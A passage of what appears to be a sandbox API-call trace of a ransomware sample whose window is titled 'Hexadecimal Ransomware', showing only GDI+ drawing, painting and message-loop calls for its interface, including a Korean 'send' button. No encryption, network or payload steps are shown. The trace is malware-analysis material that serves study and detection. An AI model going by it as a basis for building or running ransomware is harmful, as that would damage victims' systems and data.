(image=0x6e19248, width=0x11fe6c4) returned 0x0 [0169.624] GdipGetImageHeight (image=0x6e19248, height=0x11fe6c4) returned 0x0 [0169.624] GdipDrawImageRectI (graphics=0x6e19d80, image=0x6e19248, x=0, y=0, width=160, height=160) returned 0x0 [0169.628] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7e8) returned 0x0 [0169.628] BitBlt (hdc=0x10105d6, x=0, y=0, cx=138, cy=174, hdcSrc=0x55010816, x1=0, y1=0, rop=0xcc0020) returned 1 [0169.628] GdipReleaseDC (graphics=0x6e19d80, hdc=0x55010816) returned 0x0 [0169.628] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0169.629] SelectObject (hdc=0x55010816, h=0x85000f) returned 0x67050800 [0169.629] DeleteDC (hdc=0x55010816) returned 1 [0169.629] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0169.629] DeleteObject (ho=0x67050800) returned 1 [0169.629] EndPaint (hWnd=0x102e2, lpPaint=0x11fe78c) returned 1 [0169.630] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.630] IsWindowUnicode (hWnd=0x102e4) returned 1 [0169.630] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0169.630] TranslateMessage (lpMsg=0x11fed00) returned 0 [0169.630] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0169.630] BeginPaint (in: hWnd=0x102e4, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0x10105d6 [0169.630] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0169.631] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0169.631] CreateCompatibleDC (hdc=0x10105d6) returned 0x3f010812 [0169.631] GetObjectType (h=0x10105d6) returned 0x3 [0169.631] CreateCompatibleBitmap (hdc=0x10105d6, cx=1, cy=1) returned 0x6a050800 [0169.631] GetDIBits (in: hdc=0x10105d6, hbm=0x6a050800, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.631] GetDIBits (in: hdc=0x10105d6, hbm=0x6a050800, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe240, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe240) returned 1 [0169.631] DeleteObject (ho=0x6a050800) returned 1 [0169.632] CreateDIBSection (in: hdc=0x10105d6, lpbmi=0x11fe290, usage=0x0, ppvBits=0x11fe784, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe784) returned 0x56050816 [0169.632] SelectObject (hdc=0x3f010812, h=0x56050816) returned 0x85000f [0169.632] GdipCreateFromHDC (hdc=0x3f010812, graphics=0x11fe768) returned 0x0 [0169.635] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0169.635] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=658, height=558, combineMode=0x0) returned 0x0 [0169.635] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0169.635] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0169.635] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe808) returned 0x0 [0169.635] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.635] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0169.635] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.635] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0169.635] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0169.635] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0169.635] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7fc) returned 0x0 [0169.635] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe828) returned 0x0 [0169.635] GetWindowTextLengthW (hWnd=0x102e4) returned 0 [0169.635] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.636] GetSystemMetrics (nIndex=42) returned 0 [0169.636] GetWindowTextW (in: hWnd=0x102e4, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.636] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.636] GetClientRect (in: hWnd=0x102e4, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0169.636] GdipCreateRegion (region=0x11fe644) returned 0x0 [0169.636] GdipGetClip (graphics=0x6e19d80, region=0x6e1a380) returned 0x0 [0169.636] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0169.636] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a410) returned 0x0 [0169.636] GdipIsMatrixIdentity (matrix=0x6e1a410, result=0x11fe65c) returned 0x0 [0169.636] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0169.636] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ea0) returned 0x0 [0169.636] LocalFree (hMem=0x1593ea0) returned 0x0 [0169.897] GdipCombineRegionRegion (region=0x6e1a380, region2=0x6e1a090, combineMode=0x1) returned 0x0 [0169.897] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0169.897] GdipGetMatrixElements (matrix=0x6e1a410, matrixOut=0x1593ae8) returned 0x0 [0169.897] LocalFree (hMem=0x1593ae8) returned 0x0 [0169.897] GdipDeleteMatrix (matrix=0x6e1a410) returned 0x0 [0169.898] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe684) returned 0x0 [0169.898] GdipIsInfiniteRegion (region=0x6e1a380, graphics=0x6e19d80, result=0x11fe674) returned 0x0 [0169.898] GdipGetRegionHRgn (region=0x6e1a380, graphics=0x6e19d80, hRgn=0x11fe674) returned 0x0 [0169.898] GdipDeleteRegion (region=0x6e1a380) returned 0x0 [0169.898] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe68c) returned 0x0 [0169.898] GetCurrentObject (hdc=0x3f010812, type=0x1) returned 0xb00017 [0169.898] GetCurrentObject (hdc=0x3f010812, type=0x2) returned 0x900010 [0169.898] GetCurrentObject (hdc=0x3f010812, type=0x7) returned 0x56050816 [0169.898] GetCurrentObject (hdc=0x3f010812, type=0x6) returned 0x8a01c2 [0169.898] SaveDC (hdc=0x3f010812) returned 1 [0169.898] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2d040825 [0169.898] GetClipRgn (hdc=0x3f010812, hrgn=0x2d040825) returned 0 [0169.898] SelectClipRgn (hdc=0x3f010812, hrgn=0x1a04081c) returned 2 [0169.898] DeleteObject (ho=0x2d040825) returned 1 [0169.898] DeleteObject (ho=0x1a04081c) returned 1 [0169.899] OffsetViewportOrgEx (in: hdc=0x3f010812, x=0, y=0, lppt=0x334ab78 | out: lppt=0x334ab78) returned 1 [0169.899] GetNearestColor (hdc=0x3f010812, color=0x0) returned 0x0 [0169.899] CreateSolidBrush (color=0x0) returned 0x20100826 [0169.899] FillRect (hDC=0x3f010812, lprc=0x11fe690, hbr=0x20100826) returned 1 [0169.926] DeleteObject (ho=0x20100826) returned 1 [0169.926] RestoreDC (hdc=0x3f010812, nSavedDC=-1) returned 1 [0169.927] GdipReleaseDC (graphics=0x6e19d80, hdc=0x3f010812) returned 0x0 [0169.927] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd910dbd) returned 0x0 [0169.927] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0169.927] GetWindowTextLengthW (hWnd=0x102e4) returned 0 [0169.927] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0169.927] GetSystemMetrics (nIndex=42) returned 0 [0169.927] GetWindowTextW (in: hWnd=0x102e4, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0169.927] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0169.927] GdipGetImageWidth (image=0x6e19848, width=0x11fe6c4) returned 0x0 [0169.927] GdipGetImageHeight (image=0x6e19848, height=0x11fe6c4) returned 0x0 [0169.927] GdipDrawImageRectI (graphics=0x6e19d80, image=0x6e19848, x=0, y=0, width=768, height=516) returned 0x0 [0170.367] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7e8) returned 0x0 [0170.367] BitBlt (hdc=0x10105d6, x=0, y=0, cx=658, cy=558, hdcSrc=0x3f010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0170.371] GdipReleaseDC (graphics=0x6e19d80, hdc=0x3f010812) returned 0x0 [0170.371] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0170.444] SelectObject (hdc=0x3f010812, h=0x85000f) returned 0x56050816 [0170.445] DeleteDC (hdc=0x3f010812) returned 1 [0170.445] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0170.445] DeleteObject (ho=0x56050816) returned 1 [0170.455] EndPaint (hWnd=0x102e4, lpPaint=0x11fe78c) returned 1 [0170.456] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.456] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.456] TranslateMessage (lpMsg=0x11fed00) returned 0 [0170.456] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0170.456] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.456] IsWindowUnicode (hWnd=0x102ea) returned 1 [0170.457] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.457] TranslateMessage (lpMsg=0x11fed00) returned 0 [0170.457] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0170.457] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.457] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0170.457] TranslateMessage (lpMsg=0x11fed00) returned 0 [0170.457] DispatchMessageA (lpMsg=0x11fed00) returned 0x1 [0170.459] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0170.459] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0170.459] WaitMessage () returned 1 [0176.391] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.392] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x7f, wParam=0x1, lParam=0x60) returned 0x1302a3 [0176.392] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.393] WaitMessage () returned 1 [0176.417] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.419] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0176.419] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.420] WaitMessage () returned 1 [0176.817] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.817] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.817] WaitMessage () returned 1 [0176.817] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.818] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0176.818] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0176.818] WaitMessage () returned 1 [0188.635] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.637] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0188.641] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0188.641] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0188.641] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0188.641] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0188.643] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0188.644] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0188.644] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0188.649] GetFocus () returned 0x0 [0188.649] SetFocus (hWnd=0x102d8) returned 0x0 [0188.659] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0188.660] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0188.661] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0188.661] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0188.661] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0188.662] GetStockObject (i=5) returned 0x900015 [0188.662] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0188.662] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xd, wParam=0x5, lParam=0x1591ba0) returned 0x4 [0188.662] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0188.662] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0188.662] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0188.663] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0188.669] IsWindowUnicode (hWnd=0x102d8) returned 1 [0188.669] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.670] GetKeyState (nVirtKey=16) returned 0 [0188.670] GetKeyState (nVirtKey=17) returned 0 [0188.670] GetKeyState (nVirtKey=18) returned -128 [0188.670] TranslateMessage (lpMsg=0x11fed00) returned 1 [0188.670] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.670] GetKeyState (nVirtKey=16) returned 0 [0188.670] GetKeyState (nVirtKey=17) returned 0 [0188.670] GetKeyState (nVirtKey=18) returned -128 [0188.670] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x105, wParam=0x1b, lParam=0xe0010001) returned 0x0 [0188.671] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.671] IsWindowUnicode (hWnd=0x102d8) returned 1 [0188.671] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.671] GetKeyState (nVirtKey=16) returned 0 [0188.671] GetKeyState (nVirtKey=17) returned 0 [0188.671] GetKeyState (nVirtKey=18) returned 0 [0188.671] TranslateMessage (lpMsg=0x11fed00) returned 1 [0188.671] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.671] GetKeyState (nVirtKey=16) returned 0 [0188.671] GetKeyState (nVirtKey=17) returned 0 [0188.671] GetKeyState (nVirtKey=18) returned 0 [0188.671] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x101, wParam=0x12, lParam=0xc0380001) returned 0x0 [0188.671] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.672] IsWindowUnicode (hWnd=0x102d8) returned 1 [0188.672] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.672] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.672] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.673] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.674] IsWindowUnicode (hWnd=0x102d8) returned 1 [0188.674] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0188.674] TranslateMessage (lpMsg=0x11fed00) returned 0 [0188.674] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0188.675] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0xf0105ee [0188.675] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0188.675] CreateCompatibleDC (hdc=0xf0105ee) returned 0x15010830 [0188.675] SelectObject (hdc=0x15010830, h=0xb050815) returned 0x85000f [0188.676] GdipCreateFromHDC (hdc=0x15010830, graphics=0x11fe760) returned 0x0 [0188.677] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0188.677] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0188.677] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0188.677] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0188.678] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0188.678] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0188.678] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ae8) returned 0x0 [0188.678] LocalFree (hMem=0x1593ae8) returned 0x0 [0188.678] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0188.678] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0188.678] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0188.678] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0188.678] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0188.678] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd8f0dbd) returned 0x0 [0188.679] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0188.679] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0188.679] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.679] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.679] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.679] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.680] SaveDC (hdc=0x15010830) returned 1 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.680] GetNearestColor (hdc=0x15010830, color=0x989898) returned 0x989898 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.680] GetNearestColor (hdc=0x15010830, color=0x7f7f7f) returned 0x7f7f7f [0188.680] GetNearestColor (hdc=0x15010830, color=0x989898) returned 0x989898 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.680] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.681] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.681] GdipReleaseDC (graphics=0x6e19d80, hdc=0x15010830) returned 0x0 [0188.681] IsAppThemed () returned 0x1 [0188.681] GetThemeAppProperties () returned 0x3 [0188.681] GetThemeAppProperties () returned 0x3 [0188.682] IsAppThemed () returned 0x1 [0188.682] GetThemeAppProperties () returned 0x3 [0188.682] GetThemeAppProperties () returned 0x3 [0188.682] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x334b564 | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0188.685] IsAppThemed () returned 0x1 [0188.685] GetThemeAppProperties () returned 0x3 [0188.685] GetThemeAppProperties () returned 0x3 [0188.685] IsAppThemed () returned 0x1 [0188.685] GetThemeAppProperties () returned 0x3 [0188.685] GetThemeAppProperties () returned 0x3 [0188.685] GetFocus () returned 0x102d8 [0188.685] IsAppThemed () returned 0x1 [0188.685] GetThemeAppProperties () returned 0x3 [0188.685] GetThemeAppProperties () returned 0x3 [0188.686] IsAppThemed () returned 0x1 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] IsThemePartDefined () returned 0x1 [0188.686] IsAppThemed () returned 0x1 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0188.686] IsAppThemed () returned 0x1 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] IsAppThemed () returned 0x1 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] GetThemeAppProperties () returned 0x3 [0188.686] IsThemePartDefined () returned 0x1 [0188.686] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0188.686] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0188.686] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0188.686] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0188.686] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0188.687] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0188.687] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0188.687] LocalFree (hMem=0x1593ed8) returned 0x0 [0188.687] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0188.687] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0188.687] LocalFree (hMem=0x1593ed8) returned 0x0 [0188.687] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0188.687] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0188.687] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0188.687] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0188.687] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0188.687] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe518) returned 0x0 [0188.687] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.687] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.687] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.687] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.688] SaveDC (hdc=0x15010830) returned 1 [0188.688] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1b04081c [0188.688] GetClipRgn (hdc=0x15010830, hrgn=0x1b04081c) returned 0 [0188.688] SelectClipRgn (hdc=0x15010830, hrgn=0x2f040825) returned 2 [0188.688] DeleteObject (ho=0x1b04081c) returned 1 [0188.688] DeleteObject (ho=0x2f040825) returned 1 [0188.688] OffsetViewportOrgEx (in: hdc=0x15010830, x=0, y=0, lppt=0x334bc14 | out: lppt=0x334bc14) returned 1 [0188.688] DrawThemeParentBackground () returned 0x0 [0188.689] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0188.689] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0188.689] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0188.689] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0188.689] GetSystemMetrics (nIndex=42) returned 0 [0188.689] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0188.689] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0188.689] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0188.689] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.689] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.689] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.689] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.690] SaveDC (hdc=0x15010830) returned 2 [0188.690] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.690] CreateSolidBrush (color=0x0) returned 0x21100826 [0188.690] FillRect (hDC=0x15010830, lprc=0x11fdf30, hbr=0x21100826) returned 1 [0188.690] DeleteObject (ho=0x21100826) returned 1 [0188.690] RestoreDC (hdc=0x15010830, nSavedDC=-1) returned 1 [0188.690] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0188.690] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0188.690] GetSystemMetrics (nIndex=42) returned 0 [0188.690] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0188.691] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0188.691] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0188.691] GetCurrentObject (hdc=0x15010830, type=0x1) returned 0xb00017 [0188.691] GetCurrentObject (hdc=0x15010830, type=0x2) returned 0x900010 [0188.691] GetCurrentObject (hdc=0x15010830, type=0x7) returned 0xb050815 [0188.691] GetCurrentObject (hdc=0x15010830, type=0x6) returned 0x8a01c2 [0188.691] SaveDC (hdc=0x15010830) returned 2 [0188.691] GetNearestColor (hdc=0x15010830, color=0x0) returned 0x0 [0188.691] CreateSolidBrush 